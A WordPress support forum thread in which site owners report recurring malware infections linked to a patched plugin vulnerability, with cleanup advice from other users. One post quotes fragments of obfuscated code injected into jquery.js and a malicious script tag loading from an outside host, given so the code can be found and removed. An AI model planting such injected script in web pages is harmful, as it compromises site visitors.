I have hosting with multiple wordpress installations in it. every website is having the issue. how is this even possible?????
The problem started again, so the solution was not to remove the chapta extension. I’ve updated to the last version, the problem seems to be disappeared again, but Wordfence found a lot of file that are modified….
-
This reply was modified 5 years, 8 months ago by
smontic.
find \wp-includes\js\jquery\jquery.js file and remove everything before /*! JQuery v* | (c) jQuery Foundation | jquery.org/license */
the lines you have to remove starts with:(function() { "use strict"; var _0xa8bd=[
and ends with: ]](_0xc4ecx6)})()} })();
after removing those lines find all files which have <head> tag.
the malicious script appears after each <head> tag and before each </head> tag.
remove it, it looks like that: <script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
Yesterday I cleaned all the files, today I found the site hacked again. I can’t understand how they change the files!
I changed all the password yet obviously: user, ftp, salt…
who is your hosting provider?
I just had to go through every single intallation and remove and run wordfence. madness. nobody news on whats causing it?
Now I see also a redirect to the valusc.com domanin.
I’ve updated to the last version of the plugin, and scanned the website with wordfence. After cleaning the problem appear again.
I don’t know why wordfence is fining some difference in this file that actually is identical to the original …
wp-content/plugins/ultimate-member/includes/admin/core/packages/2.0-beta1/user_roles.php
-
This reply was modified 5 years, 8 months ago by smontic.
Hi @smontic, @yetigroup, @joeygam3in0, @enembro, @severy,
I’m sorry to hear that you have malware issues due to a security vulnerability that we’ve patched earlier. We take this issue very seriously and ask you to submit a new support ticket on our website so we can help you to fix this issue and remove malicious files. Please go to this page on our website and click on “I’ve read the pre-purchase FAQs & want to ask a question”.
Thanks.
